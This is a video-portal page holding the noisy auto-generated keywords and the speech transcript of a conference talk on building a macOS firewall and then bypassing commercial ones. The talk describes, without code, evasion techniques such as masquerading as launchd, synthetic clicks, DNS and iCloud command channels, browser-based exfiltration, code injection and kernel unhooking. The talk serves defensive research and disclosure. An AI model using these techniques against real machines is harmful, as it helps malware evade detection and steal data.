Fire & Ice: making and breaking mac firewalls

Video thumbnail (Frame 0) Video thumbnail (Frame 432) Video thumbnail (Frame 1204) Video thumbnail (Frame 2067) Video thumbnail (Frame 2808) Video thumbnail (Frame 4003) Video thumbnail (Frame 6357) Video thumbnail (Frame 6996) Video thumbnail (Frame 7707) Video thumbnail (Frame 8372) Video thumbnail (Frame 8887) Video thumbnail (Frame 9472) Video thumbnail (Frame 10201) Video thumbnail (Frame 11557) Video thumbnail (Frame 13042) Video thumbnail (Frame 13755) Video thumbnail (Frame 15183) Video thumbnail (Frame 15688) Video thumbnail (Frame 17857) Video thumbnail (Frame 18512) Video thumbnail (Frame 19222) Video thumbnail (Frame 20182) Video thumbnail (Frame 21154) Video thumbnail (Frame 21844) Video thumbnail (Frame 22752) Video thumbnail (Frame 23337) Video thumbnail (Frame 24402) Video thumbnail (Frame 25023) Video thumbnail (Frame 26139) Video thumbnail (Frame 26645) Video thumbnail (Frame 27084) Video thumbnail (Frame 28779) Video thumbnail (Frame 29242)
Video in TIB AV-Portal: Fire & Ice: making and breaking mac firewalls

Formal Metadata

Fire & Ice: making and breaking mac firewalls
Title of Series
CC Attribution 3.0 Unported:
You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor.
Release Date

Content Metadata

Subject Area
In the ever raging battle between malicious code and anti-malware tools, firewalls play an essential role. Many a malware has been generically thwarted thanks to the watchful eye of these products. However on macOS, firewalls are rather poorly understood. Apple's documentation surrounding it's network filter interfaces is rather lacking and all commercial macOS firewalls are closed source. This talk aims to take a peek behind the proverbial curtain revealing how to both create and 'destroy' macOS firewalls. In this talk, we'll first dive into what it takes to create an effective firewall for macOS. Yes we'll discuss core concepts such as kernel-level socket filtering—but also how to communicate with user-mode components, install privileged code in a secure manner, and simple ways to implement self-defense mechanisms (including protecting the UI from synthetic events). Of course any security tool, including firewalls, can be broken. After looking at various macOS malware specimens that proactively attempt to detect such firewalls, we'll don our 'gray' (black?) hats to discuss various attacks against these products. And while some attacks are well known, others are currently undisclosed and can generically bypass even today's most vigilant Mac firewalls. But all is not lost. By proactively discussing such attacks, combined with our newly-found understandings of firewall internals, we can improve the existing status quo, advancing firewall development. With a little luck, such advancements may foil, or at least complicate the lives of tomorrow's sophisticated Mac malware!
Graphical user interface Enterprise architecture Numerical digit Transport Layer Security Firewall (computing) Information security
Server (computing) Game controller Proxy server Open source Numerical digit Firewall (computing) Sheaf (mathematics) Information privacy Product (business) Malware Goodness of fit Computer configuration Information security Cybersex Computer font Shift operator Firewall (computing) Server (computing) Computer network Trigonometric functions Process (computing) Malware Authorization Block (periodic table) Freeware Physical system
Asynchronous Transfer Mode Digital filter Functional (mathematics) Group action Code Firewall (computing) Multiplication sign Strut Public domain Usability Kernel (computing) Military operation Network socket Operator (mathematics) Energy level Data structure Communications protocol Extension (kinesiology) Determinant UDP <Protokoll> Execution unit Electronic program guide Computer network Public domain Computer programming Flow separation Type theory Kernel (computing) Computer configuration Software Network socket Communications protocol Data structure Operating system Extension (kinesiology)
Demon Group action Thread (computing) Multiplication sign Strut Parameter (computer programming) Component-based software engineering Semiconductor memory Kernel (computing) Network socket Shared memory Process (computing) HTTP cookie Physical system Block (periodic table) Principal ideal domain Thread (computing) Connected space Process (computing) Fluid statics Block (periodic table) Asynchronous Transfer Mode Slide rule Digital filter Asynchronous Transfer Mode Functional (mathematics) Fehlererkennungscode Firewall (computing) Event horizon Latent heat Read-only memory Operator (mathematics) Queue (abstract data type) Communications protocol Address space Demon Information Computer program Group action Computer programming Word Kernel (computing) Event horizon Logic Personal digital assistant Network socket Function (mathematics) Radio-frequency identification HTTP cookie Operating system Address space
Demon Group action Thread (computing) Dependent and independent variables Firewall (computing) Database Rule of inference Malware Component-based software engineering Network socket Process (computing) Extension (kinesiology) Physical system Software development kit Rule of inference Dependent and independent variables Demon Interface (computing) Login Client (computing) Database Cartesian coordinate system Thread (computing) Connected space Message passing Kernel (computing) Event horizon output Block (periodic table)
Rule of inference Proxy server Open source Firewall (computing) Firewall (computing) Code Exploit (computer security) Product (business) Revision control Malware Hacker (term) Information security Information security Vulnerability (computing) Scalable Coherent Interface
Slide rule Game controller Context awareness Installation art Proxy server Ferry Corsten Firewall (computing) Sheaf (mathematics) Generic programming Product (business) Malware Software Cuboid Information Proxy server Physical system Vulnerability (computing) Context awareness Firewall (computing) Server (computing) Instance (computer science) Cartesian coordinate system Twitter Product (business) Latent heat Malware Software framework Information security Physical system Laptop
Asynchronous Transfer Mode Code Firewall (computing) Strut Coroutine Software bug Component-based software engineering Root Kernel (computing) Fiber bundle Logic Extension (kinesiology) Local ring Resource allocation Information security Library (computing) Vulnerability (computing) Installation art Demon Firewall (computing) Memory management Exploit (computer security) 32-bit Root Kernel (computing) Ring (mathematics) Software Revision control Buffer overflow Local ring Operating system Asynchronous Transfer Mode Data buffer
Slide rule Digital filter Firewall (computing) Firewall (computing) 1 (number) Computer network Cartesian coordinate system Rule of inference Product (business) Malware Latent heat Process (computing) Kernel (computing) Malware Logic Software testing Extension (kinesiology) Information security Proxy server
Email Slide rule Sine Proxy server Firewall (computing) Programmable read-only memory Maxima and minima Proper map Malware Component-based software engineering Authorization Electronic visual display Utility software Process (computing) Computer-assisted translation Default (computer science) Addition Firewall (computing) Server (computing) Weight Binary code Electronic mailing list Heat transfer Computer network Group action Connected space Process (computing) Internetworking Oval Utility software Moving average Authorization Physical system
Server (computing) Matching (graph theory) Mapping Computer file Code Firewall (computing) Public domain Computer network Public domain Rule of inference Connected space Uniform resource locator Process (computing) Software testing Process (computing) UDP <Protokoll> Local ring Communications protocol
Proxy server Firewall (computing) Direction (geometry) Firewall (computing) Computer network Usability Client (computing) Web browser Generic programming Cartesian coordinate system Web browser Product (business) Product (business) Online chat Latent heat Malware Function (mathematics) Cuboid Utility software Process (computing) Communications protocol Proxy server Physical system Physical system
Demon Asynchronous Transfer Mode Randomization Game controller Dependent and independent variables Firewall (computing) Image resolution Strut Public domain Direct numerical simulation Duality (mathematics) Malware Sign (mathematics) Moving average Proxy server Physical system Chi-squared distribution Service (economics) Continuous track Image resolution Firewall (computing) Server (computing) Public domain Cartesian coordinate system Process (computing) Software Direct numerical simulation Communications protocol Sinc function
Scripting language Slide rule Server (computing) Scripting language Firewall (computing) Firewall (computing) Computer network Parameter (computer programming) Web browser Interface (computing) Web browser Connected space Web 2.0 Uniform resource locator Uniform resource locator Malware Software Process (computing)
Point (geometry) Slide rule Injektivität Proxy server Code Firewall (computing) Multiplication sign View (database) Spyware Web browser Variable (mathematics) Product (business) Malware Read-only memory Kernel (computing) Energy level Integrated development environment Process (computing) Context awareness Firewall (computing) Code Cartesian coordinate system Process (computing) Kernel (computing) Fluid statics Software Network socket Library (computing)
Asynchronous Transfer Mode Digital filter Proxy server Firewall (computing) Source code Device driver Web browser Product (business) Latent heat Root Strategy game Kernel (computing) Network socket Extension (kinesiology) Information security Injektivität Patch (Unix) Firewall (computing) Computer network Product (business) Arithmetic mean Kernel (computing) Personal digital assistant Network socket Different (Kate Ryan album) Information security Asynchronous Transfer Mode
Freeware Malware Information Object (grammar) Information security
Dialect Enterprise architecture Demon Numerical digit Digitizing Information security Information security Lattice (order) 2 (number)
all right Aloha and welcome to my talk on making and breaking mac firewalls my name is Patrick I worked at digital security where we are creating cybersecurity tools for the Mac Enterprise I'm also the creator of the Mac security website objective-c whew so today thank
you thank you we're gonna be talking about creating or making a Mac firewall and then we're gonna kind of shift gears and talk about breaking and bypassing such products so about a year ago I decided I wanted to write a firewall for Mac OS because there were no free open source options so in this section of the talk we'll describe this process creating loulou which is my free open source mac and firewall now there are
many reasons you might want to create or install a firewall they're actually pretty good security tools probably the two main reasons are one to protect your privacy or two to thwart cyber attacks because most firewalls are able to generically detect malware when the malware connects out perhaps to exfiltrate data or connect to a command control server for tasking so what our firewall is going to do is monitor all network traffic allowing traffic out that's trusted and ideally blocking or prevented unauthorized or malicious traffic now since we're going to need to
monitor all traffic globally we're going to have to write a kernel extension in Mac OS Apple provides network kernel extensions or NK ease as a way to extend or modify the network infrastructure and one type of nke is a socket filter which as its name suggests allows code to filter network traffic at the socket level which for a firewall is perfect that's exactly what we need now there are two steps to
register a socket filter first we populate a socket filter structure and this structure contains various callbacks that once registered will be automatically invoked by the operating system on certain socket operations which then gives our firewall the ability to exam these socket actions and determine whether they should be allowed or blocked so the second step is then to invoke the socket filter register function to install your socket filter now besides the populated structure this also takes a socket domain type and protocol which means if you want to filter all socket domains types and protocols you should invoke this method or function several times okay so now
let's talk about these callbacks which as I mentioned once your socket filter is registered will be automatically invoked by the operating system on socket events the first callback is the attach callback and as we can see on the slide it will be invoked any time a new socket is created so it's created with a cookie parameter that's designed to hold any socket specific information you can really put whatever you want there so what we do is we allocate a chunk of memory and based on the pid' of the process that's creating the socket we either set it to allow for example if it's a trusted system daemon or block if it's a process that you that the user has chosen to block now if it's a process we don't recognize we set this action to ask and then we're gonna have to do some extra logic to determine what action to take so next is the connect out callback this is called before initiating an outgoing connection again it takes the same cookie which we've set to either allow block or ask and the socket and the remote address that the socket is trying to connect to so this obviously allows us to examine the endpoint now if the action has been set to allow we just return okay this tells the operating system we are ok with allowing this connection to continue if it's set to block we return an error code from this function which tells the operating system we want to block or not allow the connection and if it's set to ask we have to act execute some extra logic to determine what action to take so in other words we have
to figure out whether to allow or block the connection so what we do is we first put the thread to sleep that's trying to perform the socket operation this will pause the action we then ask our user mode firewall component for assistance and we pass the information from the kernel specifically the pit and the socket via as shared queue once the daemon gets this request
from the kernel socket filter it Maps the Pig to a path and first checks a rules database to see if that path is in the database if it's not found perhaps it's a brand new application or a piece of malware that has somehow gotten onto your system what it does is it sends a message to another firewall component that's running in the user's session and this is what actually displays the firewall alert to the user
now the users response they'll either have to click allow or block will then be passed back to the daemon the daemon will save this response to the rules database so moving forward it knows what to do and then also sends this response back to the kernel component via an i/o kit interface the kernel extension will then wake up the thread that was put to sleep and then apply the action either allowing the connection or blocking it
so that's basically all that's needed to create a comprehensive firewall for Mac OS and putting this all together we have Lulu as I mentioned Lulu is a free firewall I don't think end users should have to pay for security products and also the full source for the firewall is online on github and as of today you can download and install version 1.0 awesome
thank you these friendly audience today I really like this alright so DEFCON in my opinion is predominantly you know a hacker conference about breaking things and exploits and vulnerabilities so let's kind of switch gears and talk about now braking and bypassing such firewall products so imagine you're an attacker or a piece of malicious code that has
somehow made it on to an end system unfortunately there's a firewall that's installed so if you are going to connect out perhaps the exfiltrate data or connect to a command and control server the firewall is going to detect and block this so your goal is simple how can you connect out without the firewall blocking this data so in this section we'll first look at some firewall aware malware well then look at some security vulnerabilities in firewall products and then end with ways to completely bypass the firewalls so first it's definitely
important for malware or an implant to detect if a firewall is installed on the Box otherwise it really might be their undoing as the firewall may detect a previously undetected malware when it tries to connect out and as we can see on the slide this has happened now I've yet to see any public Mac malware that tries to specifically bypass Mac firewalls but there are some specimens that are firewall aware and what I mean by that is they will enumerate installed processes or look specifically for firewalls and if they see an installed firewall they will not persistently infect that's ystem one example of this is devil robber and what devil robber dud is it looked for Little Snitch which is a popular Mac firewall that was installed it would not infect the system it would just execute a benign instance of the application it had infected and then simply exit okay now on to some
security issues software such as firewalls often very complex and firewalls often run with elevated privileges or even in the kernel now unfortunately they're not as well-written as the operating system nor have been audited as well which makes them excellent excellent targets for local privilege vulnerabilities so I talked about this bug at Def Con a while ago but just briefly to go over it's kind of a neat kernel bug that affected the Little Snitch firewall kernel extension basically the firewall took a 64-bit value from user mode and used that in an allocation and a copy routine unfortunately the allocation routine expected a 32-bit value so it truncate that however the copy routine expected a full 64-bit value so it allowed us to have a controllable mismatch between the allocation and then the copy routine which led to it exploitable heap overflow in the kernel allowing us to execute arbitrary code in ring zero
another issue I found while briefly looking at Little Snitch affected its installer and updater component and short the firewall installer did not invalidate the components it was going to install so a local unprivileged attacker could modify these components and then the firewall installer or updater would naively install and execute them as root again giving a local unprivileged attacker a very reliable way to elevate their privileges
all right now on to bypassing firewalls well first look at some product specific bypasses but then we'll also look at some more powerful generic ones that can bypass all third party firewalls again the goal here is network access without being blocked now I do want to reiterate that in my opinion these bypasses are not security issues per se like they don't deserve a CVE but however they're still very valuable especially for an attacker or piece of malware which may otherwise be forded by the firewall so first up we have radio silence it's a popular firewall for Mac OS it kind of takes an interesting approach in that it allows any new process but the user can explicitly blacklist certain applications however if we look at the blacklisting logic in the kernel extension we can see it looking for a name of a process and it appears if the process is named Launch D it cannot be blacklisted nor blocked so let's test
this we take some hour we name it launch D again the path doesn't matter just the name and then we manually create a rule to blacklist this process we then run it and as we can see on the slide it's still allowed out because again it is named launch D so kind of lame but again fully bypasses this fire
another popular Mac firewall is named hands-off and it turns out that we can pretty easily bypass this via a synthetic click so for example if we execute curl which is something that Mac malware often does for example to download additional components as expected the firewall will detect this unauthorized activity and display and alert what the attacker or malware can then do is send a programmatic synthetic click to that allow button which will click the allow button basically hiding the alert and allowing the connection and it also turns out there are ways you can do this without the user noticing so there are ways that you can do this invisibly so that the user is not going to see the alert and this synthetic mouse click next up we have Lulu by default Lulu trusts Apple bynars yeah you know I'm picking on everyone including my own tools that you know think it's only fair so Lulu by default trusts Apple sine processes however it gray lists certain Apple binaries which could potentially be abused for malicious activity so for example net cat and curl even those those are signed by Apple it will still alert anytime anybody executes them so the question is can we find another signed Apple utility that is not on the gray list and the answer is yes turns
out you can exfiltrate data via the Whois utility mat this was news to me so as we can see on the slide in the Lulu debug log if we execute this the firewall will see the outgoing connection because again it's global it sees all network traffic however because who is is signed by Apple proper and is not on the grey list it will be allowed now note this has been fixed I basically added who is to the grey list and finally we have little
snitch little snitch is the de facto most well-known firewall for Mac OS turns out it has an undeletable rule that says any process can talk to domains or URLs this means any process even malware is allowed to talk to Apple servers to test this we can manually create a deny rule for curl and then we can execute curl with an iCloud URL and it is still allowed so a while back i
reverse-engineered the iCloud protocol and built a CNC server on dry drive for testing purposes don't don't get mad at me Apple so it actually is a great like Dropbox like CNC server because you can get alerts when files are uploaded it's it's really great so once we understand the protocol what we can do is we can write some custom code that we can use to exfiltrate data now even if Little Snitch is installed and sees the connection it will be allowed because the endpoint we are talking to matches or maps to an iCloud domain okay so
those were some product specific bypasses kind of neat kind of funny but in my opinion there's still a little bit lame and they're lame because first an attacker would have to enumerate and determine the specific firewall product that was installed and then have one of these products specific bypasses way more powerful or generic bypasses which can just bypass any installed firewall and these are all possible because the firewall is essentially disadvantaged it has to allow some network traffic off the box for example trusted system Damons or the user is probably going to fully allow certain things like browsers so the first thing we do to find a
generic bypass is once we're on a system as a piece of malware or an attacker is passively sniff to see what traffic is allowed off the box and we can do this via the LSO F utility so if we execute this on this on a box even though I have my firewall installed obviously there's going to be some traffic that is allowed out so for example we can see browsers chat applications some Adobe licensing crap etc etc so now we know what traffic
or what processes are allowed through the firewall so for the first generic bypass we're going to indirectly exploit the trust of a process via a trusted protocol so on Mac OS anytime a DNS request is made this is handled by Apple's mdns responder this if a random application or piece of malware tries to resolve a domain the malware the application actually does not generate the network request it sent locally to the system daemon which then on the applications behalf will resolve the domain so what malware can do is
basically abuse this fact because yes again the firewall is going to see this DNS resolution but since it's just a DNS request coming from the Apple sign trusted DNS daemon which is handling all DNS requests for the entire system the firewall is going to allow it so very easily we can build a bi-directional command control protocol purely based on DNS next up let's talk about abusing
browsers and the simple fact is if you have a browser installed it's going to be able to access the network you know even if you maybe say only port 80 and 443 you know you're probably going to give it indiscriminate access to talk to any web server and again we can passively determine this via LS OS so the first way we can abuse browsers is via Apple script so as we can see on the slide we have kindly asked Safari to invisibly browse to an attacker controlled URL and any data we want to exfiltrate we can put in as a get parameter again the firewall will see this connection but as it's safari simply browsing to a URL it will not be locked now an even better way to bypass
any installed firewall is to abuse browsers command line interfaces really doesn't get any easier than this on all major browsers now support a command line interface so you can very easily programmatically execute them from a script piece of malware from the command line and again the firewall will see this connection but it's just the browser browsing to some URL so it will not block it yet another way to
generically bypass all third party firewall products is to simply inject a library or code into an application or a binary that the firewall trusts again via l sof we can determine passively what those are now what's this code this library is running in that trusted process from the firewalls point of view it will also be given that same level of trust and thus can access the network for example if the browse trusted and you inject code into the browser and that malicious code connects out the firewall will allow it because it just seasons the browser now there's many ways on Mac OS to inject into especially third-party applications we don't have time to go into all of them but I have listed them here on the slide
the final way to bypass kernels involves or firewalls rather involves getting code into the kernel and the simple fact is if an attacker is able to get code running in the kernel it's completely game over for the firewalls first a lot of firewalls will generically allow traffic that is originated from the kernel and secondarily if malicious code
is running in the kernel it can actually unregister or unhook any installed socket filter driver this will then transparently disable the firewall and then the attackers code even from user mode can connect out without having to worry about the firewall okay so let's
start wrapping this a lot so today we talked about building a firewall for Mac OS we saw that using a socket filter kernel extension really not that complicated as I mentioned the source code for Lulu is on github so if you're interested in more of the details and specifics I would recommend checking that out we then talked about breaking firewalls we showed that a lot of them actually have significant security flaws which are very problematic because the firewall is often run with root privileges or even in the kernel and then we also showed that the unfortunate reality is these products are all trivial to generically bypass now this doesn't mean we should uninstall our firewall products but I think it makes a good case for a defense-in-depth strategy for example maybe some other host based security products that can perhaps block some of the prerequisites for these attacks for example preventing dilated injection or perhaps can detect that the browser is running from the command line when the user is inactive like that's not something a firewall should detect per se but perhaps another security tool should and finally today I'm really
excited to announce a brand new Mac security conference called objective by the sea we have a really cool lineup of Mac security researchers it's also gonna be at this awesome resort in Hawaii and if you're a supporter of objective-c which you can be for 1 the conference to attend is completely free I just want to reiterate
that it's in Hawaii this is the actual resort of where it's gonna be November 3rd and 4th so I would love if you could all attend and for more information check out objective by the okay
that's a wrap I really want to thank you all for attending also want to a phat thank the friends the partners of objective-c which are digital security and malwarebytes and we have 13 seconds for questions but I will be around here after the talk to obviously answer any other question